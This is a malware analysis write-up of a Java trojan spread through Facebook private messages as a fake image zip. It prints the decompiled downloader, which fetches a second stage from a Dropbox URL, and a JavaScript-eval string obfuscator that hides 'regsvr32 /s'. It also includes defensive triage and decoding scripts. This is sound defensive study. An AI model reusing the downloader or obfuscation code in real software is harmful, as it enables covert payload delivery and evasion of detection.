
Analyzing Facebook Trojan spreading via Private Messages

I first received this malware via private message on March 6th, 2014.

[Image: facebook-message]

The attachment is IMG_00161.zip; I'm guessing it comes in any IMG_00XXX.zip flavor. While it may look like a zipped image file from a friend, it contains a malicious jar file, and on a Windows machine with Java installed a double-click on a .jar hands it to javaw.exe and runs it, no exploit required. Don't make the mistake of executing the jar file.

A VirusTotal scan gives a detection ratio of 13/49 at the time of writing, so most engines still let it through.

Unpacking the Malware

A jar is just a zip archive, so you can list its contents with any archive tool and feed the .class files to any Java decompiler (JD-GUI, for example) to get source like the following.

[Image: decompiled-jar]

import java.io.File;

public static void main(String[] args)
    throws Exception
{
    // Backslashes were lost when the listing was pasted: the decompiled
    // literals are "C:\\temp" and "C:\\temp\\goofy.dat".
    new File("C:\\temp").mkdir();
    File u = new File("C:\\temp\\goofy.dat");
    if (u.exists())
    {
        // Payload already on disk from an earlier run: skip the download.
        // sikoseTo() is Greek for "lift it"; it is defined elsewhere in the class.
        sikoseTo();
    } else {
        // toSpitiTouPepe = "Pepe's home" (where the payload is hosted),
        // oProorismosTouPepe = "Pepe's destination" (where it is saved).
        String toSpitiTouPepe =
            "http://dl.dropboxusercontent.com/s/updaxp12lp20k77/module.dat?dl=1";
        String oProorismosTouPepe = "C:\\temp\\goofy.dat";
        // RixtoKato() = "throw it down": downloads the URL to the path.
        RixtoKato(toSpitiTouPepe, oProorismosTouPepe);
    }
}

On first run the jar downloads module.dat from that Dropbox share to C:\temp\goofy.dat; on later runs, when the file is already there, it takes the sikoseTo() branch instead. Hosting the second stage on dl.dropboxusercontent.com means the fetch goes to a reputable domain over plain HTTP, and the ?dl=1 parameter forces a direct download rather than the Dropbox preview page. If you try the Dropbox URL the file seems to be deleted now, so the second stage itself is not available for analysis here.
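Much of what the decompiler shows above (the Dropbox URL, the C:\temp path, the use of javax.script) can be pulled out of the jar statically, because a class file's constant pool stores string literals as plain UTF-8. The script below is an added example, not code from the original post or from the sample: it opens a zip attachment, finds anything inside that is itself a jar regardless of extension, hashes it, reads Main-Class from the manifest and scans each .class entry for URLs, Windows paths and downloader-related JDK classes. The attachment it runs on is constructed inline as a stand-in for IMG_00161.zip (the inner jar, its hypothetical main class "Goofy" and the fake class bytes are all made up here; the planted strings are the ones visible in the decompiled main()).

```python
"""Static triage of a zipped jar attachment, without running it.

Added example, not the original post's code or the malware's. The attachment
is constructed inline as a stand-in for IMG_00161.zip: the outer zip, the
inner jar, the manifest and the fake class file are all made up here; the
strings planted in the class are the ones visible in the decompiled main().
"""
import hashlib
import io
import re
import zipfile

ZIP_MAGIC = b"PK\x03\x04"
CLASS_MAGIC = b"\xca\xfe\xba\xbe"

# Strings worth surfacing from a class file's constant pool: URLs, Windows
# paths, and the JDK classes a downloader / string decoder needs.
INDICATOR_RE = re.compile(
    rb"https?://[\x21-\x7e]+"
    rb"|[A-Za-z]:\\[\x21-\x7e]*"
    rb"|javax/script/[A-Za-z]+"
    rb"|java/net/URL[A-Za-z]*"
    rb"|java/lang/Runtime"
)


def build_sample_attachment() -> bytes:
    """Constructed IMG_00161.zip look-alike: a zip wrapping a jar (hypothetical
    main class 'Goofy'). A real .class is binary, but its constant pool keeps
    string literals as plain UTF-8, which is what the scanner relies on."""
    fake_class = (CLASS_MAGIC + b"\x00\x00\x00\x33"
                  + b"\x00http://dl.dropboxusercontent.com/s/updaxp12lp20k77/module.dat?dl=1"
                  + b"\x00C:\\temp\\goofy.dat"
                  + b"\x00javax/script/ScriptEngineManager"
                  + b"\x00java/net/URL\x00")
    jar = io.BytesIO()
    with zipfile.ZipFile(jar, "w") as z:
        z.writestr("META-INF/MANIFEST.MF",
                   "Manifest-Version: 1.0\r\nMain-Class: Goofy\r\n")
        z.writestr("Goofy.class", fake_class)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("IMG_00161.jar", jar.getvalue())
    return outer.getvalue()


def triage_jar(jar_bytes: bytes) -> dict:
    """Hash the jar, pull Main-Class from the manifest, and scan every .class
    entry for indicator strings. Nothing is executed or decompiled."""
    report = {"sha256": hashlib.sha256(jar_bytes).hexdigest(),
              "main_class": None, "entries": [], "indicators": set()}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        for name in z.namelist():
            report["entries"].append(name)
            data = z.read(name)
            if name == "META-INF/MANIFEST.MF":
                m = re.search(rb"^Main-Class:\s*(\S+)", data, re.M)
                if m:
                    report["main_class"] = m.group(1).decode()
            elif name.endswith(".class"):
                if not data.startswith(CLASS_MAGIC):
                    report["indicators"].add("non-class data in " + name)
                for m in INDICATOR_RE.finditer(data):
                    report["indicators"].add(m.group(0).decode("ascii", "replace"))
    return report


def triage_attachment(zip_bytes: bytes) -> dict:
    """Open the outer zip and triage anything inside that is itself a jar,
    whatever its extension: IMG_00161.zip 'contains' an image only by name."""
    result = {"is_zip": zip_bytes.startswith(ZIP_MAGIC), "members": [], "jars": {}}
    if not result["is_zip"]:
        return result
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for name in z.namelist():
            result["members"].append(name)
            data = z.read(name)
            if data.startswith(ZIP_MAGIC):
                try:
                    with zipfile.ZipFile(io.BytesIO(data)) as inner:
                        is_jar = "META-INF/MANIFEST.MF" in inner.namelist()
                except zipfile.BadZipFile:
                    is_jar = False
                if is_jar or name.lower().endswith(".jar"):
                    result["jars"][name] = triage_jar(data)
    return result


if __name__ == "__main__":
    rep = triage_attachment(build_sample_attachment())
    for name, jar in rep["jars"].items():
        print(name, jar["sha256"], jar["main_class"])
        print("\n".join(sorted(jar["indicators"])))
```

On a real attachment, pass the file's bytes (open(path, "rb").read()) to triage_attachment(); the sha256 is what you submit to VirusTotal, and a zip whose "image" turns out to carry a manifest and a Main-Class is enough on its own to quarantine the message.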

Update: newer samples obfuscate their strings, the download URL included. Each character is stored as a small arithmetic expression that is evaluated at run time through the JVM's bundled JavaScript engine (javax.script), formatted with DecimalFormat("#.#") so that the engine's numeric result (a Double such as 101.0) is accepted by Integer.parseInt(), and then cast to a char. The routine below is one such decoder; working through its array by hand gives "regsvr32 /s", the command line for silently registering a DLL, so the scheme hides more than URLs. A java.exe or javaw.exe process spawning regsvr32 is worth alerting on.

import java.text.DecimalFormat;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;

public static String MTGJVA()
    throws ScriptException
{
    // The JVM's bundled JavaScript engine (Rhino on Java 6/7, Nashorn on 8)
    // does the arithmetic, so no custom evaluator appears in the jar.
    ScriptEngineManager localScriptEngineManager =
        new ScriptEngineManager();
    ScriptEngine localScriptEngine =
        localScriptEngineManager.getEngineByName("JavaScript");
    // One expression per character; each evaluates to a character code.
    String[] arrayOfString = { "-1041+1155", "668317/6617", "75499/733",
        "846055/7357", "969488/8216", "2247-2133", "8087-8036",
        "104000/2080", "1698-1666", "80041/1703", "-785+900" };
    // "#.#" turns the engine's numeric result (e.g. 101.0) into "101" so that
    // Integer.parseInt() accepts it.
    DecimalFormat localDecimalFormat = new DecimalFormat("#.#");
    StringBuilder localStringBuilder =
        new StringBuilder(arrayOfString.length);
    for (int i = 0; i < arrayOfString.length; i++)
    {
        Object localObject = localScriptEngine.eval(arrayOfString[i]);
        int j = Integer.parseInt(localDecimalFormat.format(localObject));
        localStringBuilder.append((char)j);  // character code -> character
    }
    return localStringBuilder.toString();    // "regsvr32 /s"
}


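Rather than running the sample's decoder in a JVM, the strings can be recovered offline. The script below is an added example (not the author's code and not from the sample): it reimplements the eval / DecimalFormat("#.#") / Integer.parseInt() / (char) pipeline with exact rational arithmetic and a strict "integer op integer" grammar, so untrusted expressions never reach an interpreter, and it sweeps a decompiled source text for every string-array initializer that follows the scheme. The array is copied from the MTGJVA() routine above; the snippet of Java source it scans is constructed here from that array.

```python
"""Decode the arithmetic-expression string obfuscation from the decompiled jar.

Added example, not code from the sample or the original post. Each array
element is a tiny arithmetic expression; the malware hands it to the JVM's
JavaScript engine, formats the result with DecimalFormat("#.#"), parses it
with Integer.parseInt() and casts to char. This decoder reproduces that
pipeline without a script engine, using exact rational arithmetic.
"""
import re
from fractions import Fraction

# The array copied from the decompiled MTGJVA() routine shown above.
MTGJVA_ARRAY = [
    "-1041+1155", "668317/6617", "75499/733", "846055/7357", "969488/8216",
    "2247-2133", "8087-8036", "104000/2080", "1698-1666", "80041/1703",
    "-785+900",
]

# Constructed stand-in for a decompiled source file containing such an array.
SAMPLE_SOURCE = """
public static String MTGJVA() throws ScriptException {
    String[] arrayOfString = { %s };
    ...
}
""" % ", ".join('"%s"' % e for e in MTGJVA_ARRAY)

# Only "<int> <op> <int>" is accepted; anything else is not this scheme (and
# must never reach eval(), since the strings come from untrusted code).
EXPR_RE = re.compile(r"^\s*(-?\d+)\s*([+\-*/])\s*(-?\d+)\s*$")


def eval_expr(expr: str) -> Fraction:
    """Evaluate one obfuscated element exactly (no eval(), no script engine)."""
    m = EXPR_RE.match(expr)
    if not m:
        raise ValueError(f"not a simple arithmetic expression: {expr!r}")
    a, op, b = Fraction(m.group(1)), m.group(2), Fraction(m.group(3))
    if op == "+":
        return a + b
    if op == "-":
        return a - b
    if op == "*":
        return a * b
    if b == 0:
        raise ValueError(f"division by zero in {expr!r}")
    return a / b


def decode_char(expr: str) -> str:
    """Mirror DecimalFormat("#.#") -> Integer.parseInt() -> (char) cast."""
    value = eval_expr(expr)
    # "#.#" rounds to one decimal place (Java's default HALF_EVEN, which is
    # also what Python's round() does); parseInt then fails on any remaining
    # fraction, so e.g. 7/2 -> "3.5" would throw in the original sample.
    tenths = round(value * 10)
    if tenths % 10 != 0:
        raise ValueError(f"{expr} = {float(value)} does not parse as an int")
    code = tenths // 10
    return chr(code & 0xFFFF)  # Java's (char) cast keeps the low 16 bits


def decode(exprs) -> str:
    """Decode a whole array of expressions into the hidden string."""
    return "".join(decode_char(e) for e in exprs)


# A Java array initializer whose elements are all string literals.
ARRAY_RE = re.compile(r'\{\s*((?:"[^"]*"\s*,?\s*)+)\}')
STRING_RE = re.compile(r'"([^"]*)"')


def decode_source(java_source: str) -> list:
    """Find every string-array initializer in decompiled source whose elements
    are all arithmetic expressions and return the decoded strings, so a new
    sample can be swept in one pass instead of evaluating arrays by hand."""
    found = []
    for m in ARRAY_RE.finditer(java_source):
        items = STRING_RE.findall(m.group(1))
        if items and all(EXPR_RE.match(s) for s in items):
            try:
                found.append(decode(items))
            except ValueError:
                continue  # looked like the scheme but does not decode
    return found


if __name__ == "__main__":
    print(repr(decode(MTGJVA_ARRAY)))   # 'regsvr32 /s'
    print(decode_source(SAMPLE_SOURCE))
```

Point decode_source() at the whole decompiled output of a newer sample and every obfuscated array comes back decoded, URLs and commands alike; an array that evaluates to a non-integer is skipped because the original code would have thrown on it as well.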
Conclusion

  • Clearly this affects only the Windows platform: the paths are hard-coded to C:\temp and C:\temp\goofy.dat.
  • If you are affected, scan your PC (C:\temp\goofy.dat is the dropped file to look for) and change your Facebook password, from a machine you trust. Since the message arrived from a friend's account, let them know that their account is sending it.